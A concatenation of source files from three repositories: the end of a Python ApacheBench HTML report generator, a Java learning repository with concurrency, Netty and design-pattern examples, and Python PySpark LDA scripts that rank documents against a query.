<td rowspan=4 colspan=16 align="left">
POST 参数数据 :""" + json_str + """
</td>
</tr>
</tbody>
</table>
</div>
"""
key_result_title = """
<!--key_result_title-->
<!--这里是关键数据结果-->
<div class="table-tr-header">关键数据结果</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td> </td>
<td>总请求数</td>
<td>失败数量</td>
<td>测试时长</td>
<td style="background-color:LightSteelBlue">Requests per second</td>
<td style="background-color:LightSteelBlue">Time per request1</td>
<td>Time per request2</td>
<td>Document Length</td>
<td>Total transferred</td>
<td>Transfer rate(total)</td>
</tr>
"""
key_result_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
key_result_value += """
<!--key_result_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Complete_Requests'] + """个</td>
<td>""" + test_result['Failed_Requests'] + """个</td>
<td>""" + test_result['Test_Time_Taken'] + """秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Requests_Per_Second'] + """个请求/每秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Time_Per_Request_Sum'] + """毫秒</td>
<td>""" + test_result['Time_Per_Request'] + """毫秒</td>
<td>""" + test_result['Document_Length'] + """ bytes</td>
<td>""" + test_result['Total_Transferred'] + """ bytes/秒</td>
<td>""" + test_result['Transfer_Rate'] + """ bytes/秒</td>
</tr>
"""
key_result_memo = """
<!--key_result_memo-->
<tr>
<td colspan=10 align="left">
1、Document Length:服务器处理请求后返回的响应数据长度</br>
2、Requests per second(RPS):RPS,即服务器每秒处理的请求数量</br>
3、Time per request1:</br>
a、从用户角度看,完成一个请求所需要的时间</br>
b、体现1个连接(含多个请求)耗费的总时长,当于1个用户同时发送个多个并发请求给服务器并发处理后,得到这多个请求的响应数据的总时长</br>
4、Time per request2:
a、服务器完成一个请求的时间。</br>
b、体现1个连接多个请求中平均每一次请求的耗费时长,Time per request2=Time per request1/当前并发数。</br>
5、Transfer rate:网络传输速率,即平均每秒网络传输的数据量。该项有三个子项,received、sent、total(目前仅记录total)</br></td>
</tr>
</table>
"""
response_pct_title = """
<!--response_pct_title-->
<!--这里是响应时间百分比分布-->
<div class="table-tr-header">响应时间百分比分布</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td> </td>
<td>Average</td>
<td>Min</td>
<td>50%</td>
<td>75%</td>
<td>80%</td>
<td style="background-color:LightSteelBlue">90%</td>
<td>95%</td>
<td>99%</td>
<td>Max</td>
</tr>
"""
response_pct_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
test_result = collect_date(file_path) # return dic
response_pct_value += """
<!--response_pct_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Total_Mean'] + """毫秒</td>
<td>""" + test_result['Total_Min'] + """毫秒</td>
<td>""" + test_result['50%'] + """毫秒</td>
<td>""" + test_result['75%'] + """毫秒</td>
<td>""" + test_result['80%'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['90%'] + """毫秒</td>
<td>""" + test_result['95%'] + """毫秒</td>
<td>""" + test_result['99%'] + """毫秒</td>
<td>""" + test_result['100%'] + """毫秒</td>
</tr>
"""
response_pct_memo = """
<!--response_pct_memo-->
<tr>
<td colspan=17 align="left">
1、一般较为关注90%的用户的响应时长,表示90%用户的请求所等待的时间不会超过的时间</br>
2、例如:当前接口中,90%的用户最长的等待时间不会超过""" + test_result['90%'] + """毫秒</br>
3、将所有请求的响应时间从小到大排序后,取列表中前百分比的所有请求时间,并取最大值。</br>
</td>
</tr>
</table>
"""
connect_time_title = """
<!--connect_time_title-->
<!--这里是响应时间分解表-->
<div class="table-tr-header">响应时间分解表</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td rowspan=2> </td>
<td colspan=5>Connect</td>
<td colspan=5>Processing</td>
<td colspan=5>Waiting</td>
<td colspan=5 style="background-color:LightSteelBlue">Total</td>
</tr>
<tr>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td style="background-color:LightSteelBlue">min</td>
<td style="background-color:LightSteelBlue">mean</td>
<td style="background-color:LightSteelBlue">+/-sd</td>
<td style="background-color:LightSteelBlue">median</td>
<td style="background-color:LightSteelBlue">max</td>
</tr>
"""
connect_time_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
test_result = collect_date(file_path) # return dic
connect_time_value += """
<!--connect_time_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Connect_Min'] + """毫秒</td>
<td>""" + test_result['Connect_Mean'] + """毫秒</td>
<td>""" + test_result['Connect_Sd'] + """毫秒</td>
<td>""" + test_result['Connect_Median'] + """毫秒</td>
<td>""" + test_result['Connect_Max'] + """毫秒</td>
<td>""" + test_result['Processing_Min'] + """毫秒</td>
<td>""" + test_result['Processing_Mean'] + """毫秒</td>
<td>""" + test_result['Processing_Sd'] + """毫秒</td>
<td>""" + test_result['Processing_Median'] + """毫秒</td>
<td>""" + test_result['Processing_Max'] + """毫秒</td>
<td>""" + test_result['Waiting_Min'] + """毫秒</td>
<td>""" + test_result['Waiting_Mean'] + """毫秒</td>
<td>""" + test_result['Waiting_Sd'] + """毫秒</td>
<td>""" + test_result['Waiting_Median'] + """毫秒</td>
<td>""" + test_result['Waiting_Max'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Min'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Mean'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Sd'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Median'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Max'] + """毫秒</td>
</tr>
"""
connect_time_memo = """
<tr>
<td colspan=21 align="left">
1、Connect:表示网络延时加上与远程服务器建立连接所耗费的时间</br>
2、Processing:表示第一个字节发出去至接受到第一个响应字节之间所耗费的时间, 这里大致可以推断出服务器的处理能力。</br>
3、Waiting:表示最后一个字节发送完至接受到第一个字节到响应时间间隔。</br>
4、Total:表示从建立连接开始至接受到第一个字节响应的总时间。</br>
5、mean:平均值。即一个页请求平均花费了多长时间。</br>
6、[+/-sd]:标准偏差。描述结果数据的波动大小。</br>
7、Total并不等于前三行数据相加,因为前三行的数据并不是在同一个请求中采集到的,所以Total是从整个请求所需要的时间的角度来统计的。</br>
</tr>
</table>
</div>
"""
return part_one_api_info + \
key_result_title + key_result_value + key_result_memo + \
response_pct_title + response_pct_value + response_pct_memo \
+ connect_time_title + connect_time_value + connect_time_memo
def get_report_file_list(cmd_str_list):
report_file_list = []
for cmd in cmd_str_list:
report_file_list.append(cmd.split("> ")[1].split("sleep")[0])
return report_file_list
def write_html(html_content):
# report_file_name="Daily_单接口压测报告_"+datetime.datetime.strftime(datetime.datetime.now(), 'z%Y%m%d%_H%M%S')+".html"
report_file_name = "Daily_单接口压测报告_" + time.strftime('%Y%m%d%H%M', time.localtime()) + ".html"
report_file_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/ReportFile/"
with open(report_file_path + report_file_name, 'w', encoding="utf-8") as file:
file.write(html_content)
# if __name__ == '__main__':
# HtmlReport.collect_date("/Users/panpan/Desktop/DDStudy/OcrDemo/1.txt",40)
# generate_report()
| 1006ddd4195c56e02bd87a94ae1270509d46ad12 | [
"Markdown",
"Python"
] | 4 | Python | Zekylly/ApacheBenchmarkAPITestTool | ab2bc884b20604f04e775ceb3b4ee4c16b617bd9 | 5335d54d2a477bcc90cc04e21cb676515b1cf54d |
refs/heads/master | <repo_name>thanq/javalearn<file_sep>/src/main/java/share/share_currency/Test.java
package share.share_currency;
import java.util.Hashtable;
import java.util.concurrent.ConcurrentHashMap;
/**
* Created by bricks on 2018/2/26.
*/
public class Test {
Hashtable<String,String> hashtable = new Hashtable<>();
ConcurrentHashMap<String,String> tmp = new ConcurrentHashMap<>();
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/ThreadLocalTest.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
import java.util.concurrent.ConcurrentLinkedQueue;
/**
* Created by bricks on 2018/3/1.
*/
public class ThreadLocalTest {
ThreadLocal<Long> tmp = new ThreadLocal<>();
ConcurrentLinkedQueue tmp2 = new ConcurrentLinkedQueue();
}
<file_sep>/src/main/java/tmp/Tmp.java
package tmp;
import java.lang.instrument.Instrumentation;
/**
* Created by bricks on 2018/3/8.
*/
public class Tmp {
public static void main(String[] args){
Tmp tmp = new Tmp();
System.out.println();
}
}
<file_sep>/src/main/java/interview/module/produce_consume/block_queue/WaitNotifyModel.java
package interview.module.produce_consume.block_queue;
import interview.module.produce_consume.framework.*;
import java.util.LinkedList;
import java.util.Queue;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/1/29.
*/
public class WaitNotifyModel implements Model{
private final Object BUFFER_LOCK = new Object();
private final Queue<Task> buffer = new LinkedList<>();
private int cap;
private final AtomicInteger increTaskNo = new AtomicInteger(0);
public WaitNotifyModel(int cap){
this.cap = cap;
}
@Override
public Runnable newRunnableConsumer(){
return new ConsumerImpl();
}
@Override
public Runnable newRunnableProducer(){
return new ProducerImpl();
}
private class ConsumerImpl extends AbstractConsumer implements Consumer,Runnable {
@Override
public void consume() throws InterruptedException {
synchronized (BUFFER_LOCK) {
while (buffer.size() == 0) {
System.out.println("consumer is waiting");
BUFFER_LOCK.wait();
}
Task task = buffer.poll();
assert task != null;
// Thread.sleep(5);
System.out.println("consume" + task.no);
BUFFER_LOCK.notifyAll();
}
}
}
private class ProducerImpl extends AbstractProducer implements Producer,Runnable {
@Override
public void produce() throws InterruptedException{
// Thread.sleep(2);
synchronized (BUFFER_LOCK){
while (buffer.size() == cap){
BUFFER_LOCK.wait();
}
Task task = new Task(increTaskNo.getAndIncrement());
buffer.offer(task);
System.out.println("produce: " + task.no);
BUFFER_LOCK.notifyAll();
System.out.println("produce notifyAll");
}
}
}
public static void main(String[] args){
Model model = new WaitNotifyModel(8);
for(int i = 0; i < 4; i++){
new Thread(model.newRunnableConsumer()).start();
}
for(int i = 0; i < 4; i++){
new Thread(model.newRunnableProducer()).start();
}
}
}
<file_sep>/src/main/java/interview/module/produce_consume/framework/Consumer.java
package interview.module.produce_consume.framework;
/**
* Created by bricks on 2018/1/28.
*/
public interface Consumer {
void consume() throws InterruptedException;
}<file_sep>/src/main/java/concurrency/hashmap/MulHashMap.java
package concurrency.hashmap;
import java.util.HashMap;
import java.util.Map;
import java.util.UUID;
/**
* Created by bricks on 2018/2/2.
*/
public class MulHashMap {
public static void main(String[] args) throws Exception{
final Map<String, String> test = new HashMap<>();
Thread tmp = new Thread(new Runnable() {
@Override
public void run(){
int counter= 0;
try {
Thread.sleep(1000);
}catch (Exception ex){
ex.printStackTrace();
}
System.out.println(counter++ + " 次遍历map");
for (Map.Entry<String, String> entry : test.entrySet()) {
if(counter > 12000){
System.out.println(counter);
break;
}
System.out.println(entry.getKey() + ":" + entry.getValue());
counter++;
}
}
},"test");
Thread t = new Thread(new Runnable() {
@Override
public void run() {
for (int i = 0; i < 10000; i++) {
new Thread(new Runnable() {
@Override
public void run() {
test.put(UUID.randomUUID().toString(), "");
}
}, "ftf" + i).start();
}
}
}, "ftf");
t.start();
t.join();
tmp.start();
}
}
<file_sep>/src/main/java/netty/learn/book/netty_authoritative_guide/nio_getting_start/bio/ClientThread.java
package netty.learn.book.netty_authoritative_guide.nio_getting_start.bio;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/2/9.
*/
public class ClientThread implements Runnable{
private Socket socket;
private AtomicInteger counter;
public ClientThread(Socket socket,AtomicInteger counter){
this.socket = socket;
this.counter = counter;
}
@Override
public void run(){
BufferedReader in = null;
PrintWriter out = null;
try {
in = new BufferedReader(new InputStreamReader(
socket.getInputStream()
));
out = new PrintWriter(socket.getOutputStream(), true);
out.println("QUERY TIME ORDER");
System.out.println("send order "+ counter + "time server succeed.\n");
String resp = in.readLine();
System.out.println("Now is:" + resp);
}catch (Exception ex){
ex.printStackTrace();
}finally {
if(out != null){
out.close();
out = null;
}
if(in != null){
try {
in.close();
}catch (Exception inex){
inex.printStackTrace();
}
in = null;
}
if(socket != null){
try {
socket.close();
}catch (Exception ex){
ex.printStackTrace();
}
socket = null;
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/container_and_frame/fork_join/Fibonacci.java
package concurrency.book.the_art_of_java_concurrency_programming.container_and_frame.fork_join;
import java.util.concurrent.ForkJoinPool;
import java.util.concurrent.ForkJoinTask;
import java.util.concurrent.Future;
import java.util.concurrent.RecursiveTask;
/**
* Created by bricks on 2018/3/7.
*/
public class Fibonacci extends RecursiveTask<Integer>{
final int n;
Fibonacci(int n){
this.n = n;
}
private int compute(int small){
final int[] result = { 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89 };
return result[small];
}
@Override
public Integer compute(){
if(n <= 10){
return compute(n);
}
Fibonacci f1 = new Fibonacci(n - 1);
Fibonacci f2 = new Fibonacci(n - 2);
f1.fork();
f2.fork();
return f1.join() + f2.join();
}
public static void main(String[] args) throws Exception{
ForkJoinTask<Integer> fjt = new Fibonacci(44);
ForkJoinPool fjp = new ForkJoinPool();
Future<Integer> result = fjp.submit(fjt);
System.out.println(result.get());
}
}
<file_sep>/src/main/java/netty/learn/book/netty_authoritative_guide/nio_getting_start/bio/TimeCientThreadPool.java
package netty.learn.book.netty_authoritative_guide.nio_getting_start.bio;
import java.net.Socket;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/2/9.
*/
public class TimeCientThreadPool {
public static void main(String[] args) throws Exception {
AtomicInteger counter = new AtomicInteger(0);
int port = 8080;
if (args != null && args.length != 0) {
port = Integer.valueOf(args[0]);
}
ThreadPoolExecutor executor = new ThreadPoolExecutor(5, 10, 200, TimeUnit.MILLISECONDS,
new ArrayBlockingQueue<Runnable>(5));
while (true) {
counter.getAndIncrement();
Socket socket = null;
socket = new Socket("127.0.0.1", port);
if(executor.getQueue().size() > 3){
Thread.sleep(10);
}
ClientThread clientThread = new ClientThread(socket,counter);
executor.execute(clientThread);
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/DemoExchange.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.Exchanger;
/**
* Created by bricks on 2018/3/8.
*/
public class DemoExchange {
private static final Exchanger<String> exchange = new Exchanger<>();
public static void main(String[] args){
new Thread(new Runnable() {
@Override
public void run() {
try{
String aData = "银行流水A";
String bData = exchange.exchange(aData);
System.out.println("thread-A获取到的B的数据:" + bData);
}catch (InterruptedException ex){
ex.printStackTrace();
}
}
}) .start();
new Thread(new Runnable() {
@Override
public void run() {
try {
String bData = "银行流水B";
String aData = exchange.exchange(bData);
System.out.println("thread-B获取到的A的数据:" + aData);
}catch (Exception ex){
ex.printStackTrace();
}
}
}).start();
}
}
<file_sep>/src/main/java/concurrency/ThreadDumpTest.java
package concurrency;
/**
* Created by bricks on 2018/1/25.
*/
public class ThreadDumpTest {
public void test(){
for (int i = 0; i < 8 ; i++) {
Thread th=new Thread(new TR(i));
th.setName("MyThread-"+(1000+i));
th.start();
}
}
public static void main(String[] args) {
ThreadDumpTest t=new ThreadDumpTest();
t.test();
}
private class TR implements Runnable{
int ins=0;
TR(int i){
ins=i;
}
public void run(){
while (true) {
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/ThreadState.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
import sun.tools.jconsole.Worker;
/**
* Created by bricks on 2018/2/20.
*/
public class ThreadState {
public static void main(String[] args){
System.out.println("-----线程状态-----");
TimeWaiting timeWaiting = new TimeWaiting();
Waiting waiting = new Waiting();
Blocked blocked = new Blocked();
Blocked blocked1 = new Blocked();
Thread timeWaitingTh = new Thread(timeWaiting,"time_waiting====bricks");
Thread waitingTh = new Thread(waiting,"waiting===bricks");
Thread blockedTh = new Thread(blocked,"blocked===1-bricks");
Thread blocked1Th = new Thread(blocked1,"blocked===2-bricks");
timeWaitingTh.start();
waitingTh.start();
blockedTh.start();
blocked1Th.start();
}
static class TimeWaiting implements Runnable{
@Override
public void run(){
SleepUtil.sleepSeconds(100);
}
}
static class Waiting implements Runnable{
@Override
public void run(){
while(true) {
synchronized (Waiting.class) {
try {
Waiting.class.wait();
}catch (InterruptedException ex){
ex.printStackTrace();
}
}
}
}
}
static class Blocked implements Runnable{
@Override
public void run(){
while(true){
synchronized (Blocked.class){
SleepUtil.sleepSeconds(10);
}
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/CountdownLatchDemo.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.CountDownLatch;
/**
* Created by bricks on 2018/3/8.
*/
public class CountdownLatchDemo {
private static final int THREAD_NUM = 30;
private static final CountDownLatch countdownLatch = new CountDownLatch(THREAD_NUM);
public static void main(String[] args) throws Exception{
for(int i = 0; i < THREAD_NUM; i++){
Thread tmp = new Thread(new DataCrawl(),"爬取线程-" + i);
tmp.start();
}
countdownLatch.await();
dataReport();
}
static class DataCrawl implements Runnable{
@Override
public void run(){
System.out.println(Thread.currentThread().getName() + " 开始爬取数据");
countdownLatch.countDown();
}
}
private static void dataReport(){
System.out.println("\n=====开始生成报表====");
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/Interrupted.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
/**
* Created by bricks on 2018/2/26.
*/
public class Interrupted {
public static void main(String[] args){
Thread sleepRunner = new Thread(new SleepRunner(),"sleep-runner");
Thread busyRunner = new Thread(new BusyRunner(),"busy-runner");
// sleepRunner.setDaemon(true);
// busyRunner.setDaemon(true);
sleepRunner.start();
// busyRunner.start();
SleepUtil.sleepSeconds(4);
sleepRunner.interrupt();
// busyRunner.interrupt();
System.out.println("sleep-runner :" + sleepRunner.isInterrupted());
// System.out.println("busy-runner :" + busyRunner.isInterrupted());
SleepUtil.sleepSeconds(1);
}
static class SleepRunner implements Runnable{
private Integer counter = 0;
@Override
public void run(){
while(!Thread.currentThread().isInterrupted()) {
// while(true){
System.out.println(Thread.currentThread().isInterrupted());
SleepUtil.sleepSeconds(1);
System.out.println("第" + counter++ + "次sleep");
}
}
}
static class BusyRunner implements Runnable{
private Boolean afterInterrupted = false;
public void setAfterInterrupted(Boolean afterInterrupted){
this.afterInterrupted = afterInterrupted;
}
@Override
public void run(){
while (!Thread.currentThread().isInterrupted()){
if(afterInterrupted){
System.out.println("test");
}
}
}
}
}
<file_sep>/src/main/java/interview/designpattern/singleton/SingleTonInnerClass.java
package interview.designpattern.singleton;
import java.io.ObjectStreamException;
/**
* Created by bricks on 2018/1/28.
*/
/*
静态内部类虽然保证了单例在多线程并发下的线程安全性,但是在遇到序列化对象时,默认的方式运行得到的结果就是多例的。
*/
public class SingleTonInnerClass {
private static class MySingletonHandler{
private static SingleTonInnerClass instance = new SingleTonInnerClass();
}
private SingleTonInnerClass(){}
public static SingleTonInnerClass getInstance(){
return MySingletonHandler.instance;
}
//该方法在反序列化时会被调用,该方法不是接口定义的方法,有点儿约定俗成的感觉
protected Object readResolve() throws ObjectStreamException {
System.out.println("调用了readResolve方法!");
return MySingletonHandler.instance;
}
}
<file_sep>/src/main/java/test/reflect/dynami_loading/OfficeAble.java
package test.reflect.dynami_loading;
/**
* Created by bricks on 17/7/16.
*/
interface OfficeAble {
public void start();
}
<file_sep>/src/main/java/interview/designpattern/singleton/ThreadCheck.java
package interview.designpattern.singleton;
/**
* Created by bricks on 2018/1/28.
*/
public class ThreadCheck extends Thread{
@Override
public void run(){
System.out.println(SingleTonDCL.getInstance().hashCode());
}
public static void main(String[] args){
ThreadCheck[] chk = new ThreadCheck[10];
for(int i = 0; i < chk.length; i++){
chk[i] = new ThreadCheck();
}
for(int i = 0; i < chk.length; i++){
chk[i].start();
}
}
}
<file_sep>/src/main/java/test/reflect/dynami_loading/Word.java
package test.reflect.dynami_loading;
/**
* Created by bricks on 17/7/16.
*/
public class Word implements OfficeAble{
public void start() {
System.out.println("word start----");
}
}
<file_sep>/src/main/java/tmp/DoubleTest.java
package tmp;
/**
* Created by bricks on 2018/1/17.
*/
public class DoubleTest {
public static void main(String[] args){
Double bid = new Double("2.3");
bid = bid * 100;
System.out.println(bid);
String bidFormated = String.format("%.0f",bid);
bid = new Double(bidFormated);
System.out.println(bid);
System.out.println(3*0.1 == 0.3);
System.out.println(2*0.1 == 0.2);
System.out.println(25*0.1 == 2.5);
String tmp = "30000.0";
System.out.println("------");
String[] ee = tmp.split("\\.");
for(int i = 0; i < ee.length;i++){
System.out.println(ee[i]);
}
System.out.println("------");
System.out.println(tmp);
Double eee = new Double("9.0E-4");
System.out.println(eee);
System.out.println(eee*100);
}
}<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/Shutdown.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
/**
* Created by bricks on 2018/2/26.
*/
public class Shutdown {
public static void main(String[] args){
}
static class Runner implements Runnable{
private volatile Integer counter = 0;
@Override
public void run(){
while(true){
counter++;
}
}
}
}
<file_sep>/src/main/java/test/reflect/use_of_class/ClassUtil.java
package test.reflect.use_of_class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
* Created by bricks on 17/7/16.
*/
public class ClassUtil {
public static void printClassMessage(Object obj) throws Exception{
Class c1 = obj.getClass();
System.out.println("类名称:" + c1.getName());
Method[] methods = c1.getMethods();
for(Method item : methods){
String methodName = item.getName();
Class returnType = item.getReturnType();
Class[] paramsList = item.getParameterTypes();
System.out.print(returnType + " " + methodName + "(");
for(Class paramTmp : paramsList){
System.out.print(paramTmp.getName() + ",");
}
System.out.print(")" + "\n");
}
System.out.println("-------------------获取成员变量信息");
Field[] fs = c1.getDeclaredFields();
for(Field field:fs){
Class fieldType = field.getType();
String typeName = fieldType.getTypeName();
String fieldName = field.getName();
System.out.println(typeName + " " +fieldName);
}
System.out.println("-------------------获取构造函数信息");
Constructor[] cs = c1.getDeclaredConstructors();
for(Constructor constructor:cs){
String csName = constructor.getName();
Class[] paramsList = constructor.getParameterTypes();
System.out.print(csName + "(");
for(Class params:paramsList){
System.out.print(params.getName());
}
System.out.println(")\n");
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/DemoCyclicBarrierInterrupt.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.CyclicBarrier;
/**
* Created by bricks on 2018/3/8.
*/
public class DemoCyclicBarrierInterrupt {
static CyclicBarrier cyclicBarrier = new CyclicBarrier(2);
public static void main(String[] args) throws Exception{
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
try {
cyclicBarrier.await();
Thread.sleep(200);
}catch (Exception ex){
ex.printStackTrace();
}
}
});
thread.start();
thread.interrupt();
Thread.sleep(200);
try{
cyclicBarrier.await();
}catch (Exception ex){
ex.printStackTrace();
System.out.println(cyclicBarrier.isBroken());
}
}
}
| 86a8f8d75f7b684b5ae669c7763ad97392f620db | [
"Java"
] | 22 | Java | thanq/javalearn | ca9d65f7eb6351ee837a46112a70e16dc425e37d | 9a248c70604d928348ea9a53fd7485f76b832244 |
refs/heads/master | <file_sep># -*- coding: utf-8 -*-
"""
Created on Tue May 8 06:34:07 2018
@author: logaprakash
"""
from collections import defaultdict
from pyspark import SparkContext
from pyspark.mllib.linalg import Vectors
from pyspark.mllib.clustering import LDA
from pyspark.sql import SQLContext
import re
import numpy as np
import csv
from time import time
a = time()
def document_vector(document):
id = document[1]
counts = defaultdict(int)
for token in document[0]:
if token in vocabulary:
token_id = vocabulary[token]
counts[token_id] += 1
counts = sorted(counts.items())
keys = [x[0] for x in counts]
values = [x[1] for x in counts]
return (id, Vectors.sparse(len(vocabulary), keys, values))
sc = SparkContext('local', 'PySPARK LDA')
sql_context = SQLContext(sc)
data = sc.wholeTextFiles('/home/sakshi/Documents/big_data/data/*').map(lambda x: x[1])
num_of_stop_words = 50
num_topics = 15
num_words_per_topic = 100
max_iterations = 35
tokens = data \
.map( lambda document: document.strip().lower()) \
.map( lambda document: re.split("[\s;,#]", document)) \
.map( lambda word: [x for x in word if x.isalpha()]) \
.map( lambda word: [x for x in word if len(x) > 3] )
termCounts = tokens \
.flatMap(lambda document: document) \
.map(lambda word: (word, 1)) \
.reduceByKey( lambda x,y: x + y) \
.map(lambda tuple: (tuple[1], tuple[0])) \
.sortByKey(False)
threshold_value = termCounts.take(num_of_stop_words)[num_of_stop_words - 1][0]
vocabulary = termCounts \
.filter(lambda x : x[0] < threshold_value) \
.map(lambda x: x[1]) \
.zipWithIndex() \
.collectAsMap()
documents = tokens.zipWithIndex().map(document_vector).map(list)
#inv_voc = {value: key for (key, value) in vocabulary.items()}
lda_model = LDA.train(documents, k=num_topics, maxIterations=max_iterations)
topic_indices = lda_model.describeTopics(maxTermsPerTopic=num_words_per_topic)
topic_document_matrix = lda_model.topicsMatrix()
document_data_df = documents.map(lambda x: (x[0], x[1])).toDF(("DocID","Word_Counts"))
word_data = document_data_df.select('Word_Counts').rdd.map(lambda x: x[0])
"""
Vectorizing
"""
document_data_list = word_data.collect()
num_docs = len(document_data_list)
vocab_len = len(vocabulary)
vectors = np.zeros((num_docs,num_topics))
for document in range(0,num_docs):
for topic in range(0,num_topics):
for word in range(0,vocab_len):
if document_data_list[document][word] != 0.0:
vectors[document][topic] += document_data_list[document][word] * topic_document_matrix[word][topic]
"""
Saving required frames
"""
np.savetxt("/home/sakshi/Documents/big_data/vectors.csv", vectors, delimiter=",")
np.savetxt("/home/sakshi/Documents/big_data/topic_word_matrix.csv", topic_document_matrix, delimiter=",")
with open('/home/sakshi/Documents/big_data/vocabulary.csv', 'w') as f: # Just use 'w' mode in 3.x
w = csv.DictWriter(f, vocabulary.keys())
w.writeheader()
w.writerow(vocabulary)
"""
Ending session
"""
sc.stop()
b = time() -a<file_sep>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 9 19:21:22 2018
@author: sakshi
"""
from collections import defaultdict
from pyspark.mllib.linalg import Vectors
import numpy as np
import csv
import glob
from time import time
import os
import subprocess as sb
def document_vector(document):
id = document[1]
counts = defaultdict(int)
for token in document.split(' '):
if token in vocabulary:
token_id = vocabulary[token]
counts[token_id] += 1
counts = sorted(counts.items())
keys = [x[0] for x in counts]
values = [x[1] for x in counts]
return (id, Vectors.sparse(len(vocabulary), keys, values))
def getQueryVector(query):
query_word_count = document_vector(query.lower())
query_list = list(query_word_count)[1]
query_vector = np.zeros((num_topics))
for topic in range(0,num_topics):
for word in range(0,vocab_len):
if query_list[word] != 0.0:
query_vector[topic] += query_list[word] * topic_word_matrix[word][topic]
return query_vector
def nMostSimilarDocuments(query_vector_arg,no_of_results_arg):
dist_matrix = np.zeros((num_docs,num_topics))
for dist_index in range(num_docs):
dist_matrix[dist_index] = vectors[dist_index] - query_vector_arg
distances = np.sum(dist_matrix**2, axis=1)
return distances.argsort()[:no_of_results_arg]
def readFileLocations(path):
file_paths = []
files = glob.glob(path)
for element in files:
file_paths.append(element)
return file_paths
def displayResultPaths(result_data):
print("The recommendations are...\n")
result_paths = []
for result in result_data:
result_paths.append(file_paths[result])
print(file_paths[result])
return result_paths
def openResultsGedit(result_paths):
for path in result_paths:
proc = sb.Popen(['gedit', path])
proc.wait()
"""
Reading model data
"""
dict_reader = csv.DictReader(open('/home/sakshi/Documents/big_data/vocabulary.csv', 'r'))
vocabulary = []
for line in dict_reader:
vocabulary.append(line)
vocabulary = vocabulary[0]
vectors = np.genfromtxt('/home/sakshi/Documents/big_data/vectors.csv', delimiter=',')
vectors = vectors/np.amax(vectors)
topic_word_matrix = np.genfromtxt('/home/sakshi/Documents/big_data/topic_word_matrix.csv', delimiter=',')
"""
Declaring variables
"""
num_docs = vectors.shape[0]
num_topics = topic_word_matrix.shape[1]
vocab_len = len(vocabulary)
no_of_results = 3
path = '/home/sakshi/Documents/big_data/data/*/*'
file_paths = readFileLocations(path)
"""
Main program
"""
query = input("Enter the query:\n")
query_vec = getQueryVector(query)
#query_vec = query_vec/max(query_vec)
results = nMostSimilarDocuments(query_vec,no_of_results)
#print(results)
result_paths = displayResultPaths(results)
openResultsGedit(result_paths)
<file_sep># Ranking-MRF
Ranking of documents using Markov Random Field
| 71c59411770a7d9a711fcab13ef0c748b7c962e1 | [
"Markdown",
"Python"
